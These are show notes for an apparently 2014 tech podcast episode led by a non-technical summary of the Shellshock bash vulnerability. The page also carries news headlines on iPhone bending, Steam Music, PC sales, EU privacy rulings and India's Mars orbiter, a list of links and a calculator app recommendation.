Breki Tomasson is on the show and while we will touch on a glaring omission from Healthkit, the main story is the bash vulnerability Shellshock. Thankfully Steve Gibson agreed to drop in and explain it to us!
Multiple versions (ogg, video etc.) from Archive.org.
Please SUBSCRIBE HERE.
A special thanks to all our Patreon supporters–without you, none of this would be possible.
If you enjoy the show, please consider supporting the show here at the low, low cost of a nickel a day on Patreon. Thank you!
Big thanks to Dan Lueders for the headlines music and Martin Bell for the opening theme!
Big thanks to Mustafa A. from thepolarcat.com for the logo!
Thanks to our mods, Kylde, TomGehrke and scottierowland on the subreddit
Show Notes
Today’s guest: Breki Tomasson, creator of the CSICon podcasting network and Steve Gibson, co-host of Security Now and head of the Gibson Research Corporation
Headlines
Last week a vulnerability in bash was reported to Red Hat by Unix expert Stephane Chazelas. The vulnerability was revealed late Wednesday. GigaOm has a good roundup of the details, but it essentially allows an environmental variable with an arbitrary name to carry a malicious function definition with trailing commands. That means it can get your server to execute code. It affects any OS that implements bash which includes Apache, most versions of Linux and Mac OS X. It also can include many routers, webcams and other embedded systems. Red Hat issued a partial patch and Akamai published some mitigation measures, but more fixes from more vendors are expected.
TechCrunch reports Apple says bent iPhone 6s are extremely rare and claims only nine people have complained to the company about it. Apple claims under normal use the problem rarely occurs and notes the new iPhones are built with steel/titanium inserts to reinforce stress locations. Apple also claims iPhone 6 models underwent testing to ensure they can endure bending, sitting, torsion and other kinds of stress.
Kotaku reports Valve released the Steam Music player for its desktop client. It’s not a streaming (or should we say steaming?) service just an in-game music player for your existing collection. So for instance if you want to be able to listen to Peter Gabriel’s Steam on the Steam Music Player, we now live in a world where that’s possible.
The PC is NOT DEAD! At least not in the US. NPD reports consumer retail PC sales grew 3% in the US from July 4th through Labor Day week. Last year sales declined 2.5% in that period. Chrome OS led the way increasing 37 percent over 2013 and Mac products rose 14 percent. Windows devices dropped 3%. Overall laptops rose 3.4% while desktop sales were essentially flat.
TechCrunch reports Apple apologized for the “great inconvenience” caused by its faulty iOS 8.0.1 update and claimed developers are working around the clock to prepare iOS 8.0.2 with a fix that will hopefully arrive in the next few days. Apple officially recommends rolling back iPhone 6 and 6 Plus from 8.0.1 to 8.
Reuters reports that European data privacy regulators gave Google guidelines on legally collecting and storing user data. Google came under privacy scrutiny from the European Union as well as six individual European countries after the company combined its privacy policies and data collection from sixty services into one, and giving users no way to opt out.
Apparently the EU feels a little warmer towards Facebook, because Reuters UK has two sources that say Facebook is about to win unconditional EU approval to purchase mobile messaging startup WhatsApp for $19 billion. European telecom companies like Deutsche Telekom and Telefonica want the EU to extract concessions from Facebook in light of WhatsApps plan to add free voice-call services later this year, but it looks like that may not happen. US regulators approved the deal in April.
News From You
BigJim1 submitted the ABCNews story on the successful arrival of India’s Mars Orbiter Mission and our subreddit users voted it up. The Indian Space and Research Organization is the first agency to be successful on a Mars mission in its first attempt. The orbiter program cost $75 million which Prime Minister Narendra Modi pointed out was less than it cost to make the movie Gravity. It’s also quite a bit less than the $671 million NASA spent on the Maven mission to Mars.
Kylde didn’t want us to miss the Technology Review report that Google X Lab’s head Astro Teller, speaking at the EmTech Conference on Tuesday, said Google aims to have a continuous ring of high-altitude balloons above the Southern Hemisphere within the next year. Project Loon as its called will provide LTE data service to cell phones on the ground at rates of 22 megabits per second to fixed antennas, and five megabits per second to mobile handsets. Teller said “if we can figure out a way to take the Internet to five billion people, that’s very valuable.”
Discussion Links: Shellshock and a glaring Healthkit omission
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
http://www.reuters.com/article/2014/09/25/us-cybersecurity-shellshock-idUSKCN0HK23Y20140925
http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
http://www.openwall.com/lists/oss-security/2014/09/24/11
https://twitter.com/taviso/status/514887394294652929
http://www.wired.com/2014/09/internet-braces-crazy-shellshock-worm/
http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCRaXildXA4
http://www.zdnet.com/first-attacks-using-shellshock-bash-bug-discovered-7000034044/
http://www.theverge.com/2014/9/25/6844021/apple-promised-an-expansive-health-app-so-why-cant-i-track
Pick of the Day: SpeedCrunch via Cody Olivier
My pick is SpeedCrunch. As a game programmer and CS graduate student, I need a quick, straight forward, and simple calculator with some power behind it. Enter SpeedCrunch. It is a calculator that is completely controlled by your keyboard ( similar to command-line ) which supports user defined variables, a multitude of math functions, and comes with a table of scientific constants. It shows history, lets you retrieve previously entered equations, and my favorite feature is as you type in an equation, it will have a little pop-up with the current answer to the equation. This is very useful when I am adding up a lot of numbers and want to see the current total. It works for Windows and OSX and has a portable Windows version. I also believe the program is open source for anyone who wants to modify or look at the code.
Friday’s guest: Darren Kitchen and Len Peralta